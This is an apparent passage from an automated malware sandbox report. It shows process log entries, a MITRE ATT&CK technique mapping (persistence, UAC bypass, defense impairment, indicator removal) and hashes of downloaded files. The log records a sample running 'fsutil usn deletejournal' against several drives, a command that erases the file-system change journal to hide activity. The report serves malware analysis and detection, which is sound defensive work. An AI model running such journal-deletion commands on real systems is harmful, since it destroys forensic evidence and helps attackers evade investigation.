-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵
- Enumerates connected drives
PID:3460
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:3696
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD508e5e0823d219469f1598463077f6a55
SHA1ae9d74b0d1be865d76a15d9c230118ea85b388fd
SHA256df03ba3598574879a8da7491540a1e5bc9bfd86a975c3ef073328c5eb2849286
SHA5127d78b0a8a424df5d2373151a162acd0b103a51ac3acec1c0a18f503266db1823a28f08cc5dca9cadbf75aac3fce44988bed4bcfd7abd3ea3b5099923421ba2de
-
Filesize
1KB
MD57b0f59e173e6af879d187092c8c71b27
SHA1fb422211c517e7528e10ffd1bc8dcc76f57cf336
SHA256df24408b213ca2ea968efa469c0792c934de7936360696bb5e7ce3ffe5bdf948
SHA51227105e869c014edf99d0e25d09e34aacbcedbed79b79f91baed82a5383fe85768622221156ae736f7f4de3113d109653395a39cbf59e14613c709c27434cec26
-
Filesize
684B
MD5f8258ac442c736d7e384ffcd0990bf9f
SHA1ea32eb6f98630cbee506f7b5b6962ab720f3b8b2
SHA25610aac1bad3142406de685f43b389af7d1458e89f05ac277f594b8fe98704d599
SHA512dcaa5f92dac3a2d07dbbeb5bd3ca5ce9aeeadda0647494f12eb2a22e8f13c82495070a7161147edb7e301fd29eb1a531ffba6a23352a1e994eaca5e231b6293f